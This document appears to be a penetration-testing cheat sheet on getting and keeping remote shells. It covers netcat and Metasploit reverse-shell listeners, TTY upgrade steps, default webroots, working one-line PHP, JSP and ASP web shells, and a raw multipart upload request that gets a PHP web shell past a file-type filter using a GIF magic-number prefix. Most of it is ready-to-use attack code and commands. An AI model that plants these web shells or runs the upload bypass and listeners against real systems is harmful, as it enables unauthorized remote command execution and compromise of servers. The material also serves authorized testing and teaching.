# **Basic Information**
# **Setting up a Listener**
## **netcat**
```bash
nc -lvnp <redir_port>
rlwrap -r -f . nc -lvnp <redir_port>
```
## **MSFConsole**
```bash
msfconsole -qn
use exploit/multi/handler
set ExitOnSession false
# pick the payload that matches the callback; both below are plain (non-meterpreter) shells
set PAYLOAD cmd/unix/reverse_netcat       # Linux/Unix target
set PAYLOAD windows/shell_reverse_tcp     # Windows target
set LHOST <redir_ip>
set LPORT <redir_port>
# -j runs the handler as a background job, -z does not auto-interact with new sessions
run -j -z
```
# **Upgrading to pseudo-TTY**
```bash
# in the netcat shell: spawn a pty
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# background the netcat shell
[CTRL + z]
# on the attacker box: note the local TERM and terminal size, then hand the raw tty to nc
echo $TERM && stty size
stty raw -echo && fg
[Enter]
[Enter]
# back in the netcat shell: match the remote terminal to the local one
export TERM=xterm-256color
stty rows <rows> columns <cols>
# if the session dies while the local tty is still raw, run `reset` locally to recover it
```
# **Web Shell**
- If a file upload is possible, below is a list of the default web roots for common web servers; a shell dropped there is reachable over HTTP.
| Web Server | Default Webroot |
| ---------- | ------------------------ |
| Apache | `/var/www/html/` |
| Nginx | `/usr/local/nginx/html/` (source build; distro packages use `/var/www/html/` or `/usr/share/nginx/html/`) |
| IIS | `c:\inetpub\wwwroot\` |
| XAMPP | `C:\xampp\htdocs\` |
Below are the most basic web shells for PHP, JSP and ASP. The PHP one reads `cmd` from either GET or POST. The JSP one collects the command's stdout and writes it into the response; `Runtime.exec` with a single string splits it on whitespace, so pipes and redirections need to be wrapped in `/bin/sh -c`. The ASP one evaluates whatever VBScript is passed in `cmd`, so it takes VBScript rather than an OS command.
```php
<?php system($_REQUEST["cmd"]); ?>
```
```jsp
<%@ page import="java.io.*" %>
<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while ((l = r.readLine()) != null) out.println(l); %>
```
```asp
<% eval request("cmd") %>
```
Run the following to execute a command through the PHP shell (quote the URL so the local shell does not treat `?` as a glob, and percent-encode any command containing spaces or special characters):
```bash
curl 'http://target.com/rev.php?cmd=id'
```
### **File Type Bypass**
- Using Burp Suite, upload a file type that is allowed and send that request to `Repeater`. Within `Repeater`, change the file name and contents to those of a web shell. Depending on what the application checks, the filter can be bypassed by changing one or more of:
  - `Content-Type` - change this to `image/png`, `text/plain`, `application/octet-stream`, etc.
  - Add the magic number of an allowed file type to the beginning of the file
- Below is a request that bypassed the file type check by prefixing the file with the GIF magic number (`GIF89a`); the part's `Content-Type` was also set to `image/png` while the file name kept its `.php` extension.
```
POST /ajax.php?action=upload_image HTTP/1.1
Host: 172.16.201.172
Content-Length: 216
X-Requested-With: XMLHttpRequest
Accept-Language: en-GB,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye3aUbG86BHc72wcA
Csrf-Token: 2ade53193a
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Origin: http://172.16.201.172
Referer: http://172.16.201.172/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=itn4tm4uee93qkvftj88148g49
Connection: keep-alive
------WebKitFormBoundarye3aUbG86BHc72wcA
Content-Disposition: form-data; name="file"; filename="rev.php"
Content-Type: image/png
GIF89a
<?php system($_GET['cmd'])?>
------WebKitFormBoundarye3aUbG86BHc72wcA--
```
# **References**
- [Reverse Shell Generator](https://www.revshells.com/)
- [Bypass File Type Check By Adding a Magic Number](https://book.hacktricks.wiki/en/pentesting-web/file-upload/index.html?highlight=file%20uplo#bypass-content-type-magic-number-compression--resizing)
- [PayloadAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/)
- [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
# **Practical Application**
| Platform | Name | Notes |
| -------- | ---- | ----- |
| | | |